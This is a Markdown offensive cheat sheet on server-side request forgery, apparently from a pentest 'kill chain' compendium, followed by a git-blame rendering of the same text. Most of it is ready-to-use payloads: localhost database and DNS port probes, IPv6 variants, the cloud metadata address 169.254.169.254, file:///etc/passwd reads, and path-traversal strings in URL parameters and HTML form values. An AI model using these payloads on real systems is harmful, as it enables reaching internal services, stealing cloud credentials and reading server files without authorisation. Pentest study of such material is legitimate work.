killchain-compendium/exploit/web/ssrf/ssrf.md

# Server Side Request Forgery (SSRF)
is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls. The attack can either be blind or data is returned to the attacker dire tly.

## Usage

### Sanity Test Service
Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.
```URL
http://127.0.0.1:3306
http://localhost:5432
http://0.0.0.0:53
```

* IPv6
```URL
http://[::]:3306
http://:::3006
```

* Cloud info in Link Local IP range `169.254.0.0/16`
```URL
169.254.169.254 --> AWS info
169.254.169.253 --> DNS AWS VPC
169.254.169.123 --> Stratum 3 NTP
127.0.0.1:53    --> systemd DNS
```

* [Changing input format into hex or encoded](https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72)

### Reading files
```
file:///etc/passwd
```

### Request Forgery through GET parameters
* Request app server through parameter 
```sh
http://<ssrf-Server>/?url=http://<AppServer>/secret/url
```
* Request remote resources, or path traversal on remote resource
```sh
http://<ssrf-Server>/?url=/item?id=42
http://<ssrf-Server>/?url=../../etc/passwd
```
* Request subdomain URL and cut following unnecessary parameters through `&x=&id=42`. Parameter `x` does not exist. So, it will be ignored
```sh
http://<ssrf-Server>/?url=db.test.com/shop/item?secret=key&x=&id=42
```

### HTML Form 
User input through POST form on websites may open files (other MIME types) from server resources. Updating the path reference may yield unintended file content.
```HTML
<input type="radio" name="avatar" value="assets/avatars/6.png">
```
This may be used for path traversal
```HTML
<input type="radio" name="avatar" value="x/../private">
```
Check return value of the form for result.

## Tools
* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file)
* https://requestbin.com
second commit 2021-08-23 01:13:54 +02:00			`# Server Side Request Forgery (SSRF)`
news 2021-09-01 00:44:36 +02:00			`is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls. The attack can either be blind or data is returned to the attacker dire tly.`
second commit 2021-08-23 01:13:54 +02:00
			`## Usage`

			`### Sanity Test Service`
			`Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.`
news 2021-09-01 00:44:36 +02:00			```URL
second commit 2021-08-23 01:13:54 +02:00			`http://127.0.0.1:3306`
			`http://localhost:5432`
			`http://0.0.0.0:53`
			```
news 2021-09-01 00:44:36 +02:00
second commit 2021-08-23 01:13:54 +02:00			`* IPv6`
news 2021-09-01 00:44:36 +02:00			```URL
second commit 2021-08-23 01:13:54 +02:00			`http://[::]:3306`
			`http://:::3006`
			```
news 2021-09-01 00:44:36 +02:00
			* Cloud info in Link Local IP range `169.254.0.0/16`
			```URL
			`169.254.169.254 --> AWS info`
			`169.254.169.253 --> DNS AWS VPC`
			`169.254.169.123 --> Stratum 3 NTP`
			`127.0.0.1:53 --> systemd DNS`
			```

second commit 2021-08-23 01:13:54 +02:00			`* [Changing input format into hex or encoded](https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72)`

			`### Reading files`
			```
			`file:///etc/passwd`
			```

news 2021-09-01 00:44:36 +02:00			`### Request Forgery through GET parameters`
			`* Request app server through parameter`
			```sh
			`http://<ssrf-Server>/?url=http://<AppServer>/secret/url`
			```
			`* Request remote resources, or path traversal on remote resource`
			```sh
			`http://<ssrf-Server>/?url=/item?id=42`
			`http://<ssrf-Server>/?url=../../etc/passwd`
			```
			* Request subdomain URL and cut following unnecessary parameters through `&x=&id=42`. Parameter `x` does not exist. So, it will be ignored
			```sh
			`http://<ssrf-Server>/?url=db.test.com/shop/item?secret=key&x=&id=42`
			```

			`### HTML Form`
			`User input through POST form on websites may open files (other MIME types) from server resources. Updating the path reference may yield unintended file content.`
			```HTML
			`<input type="radio" name="avatar" value="assets/avatars/6.png">`
			```
			`This may be used for path traversal`
			```HTML
			`<input type="radio" name="avatar" value="x/../private">`
			```
			`Check return value of the form for result.`

			`## Tools`
second commit 2021-08-23 01:13:54 +02:00			`* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file)`
news 2021-09-01 00:44:36 +02:00			`* https://requestbin.com`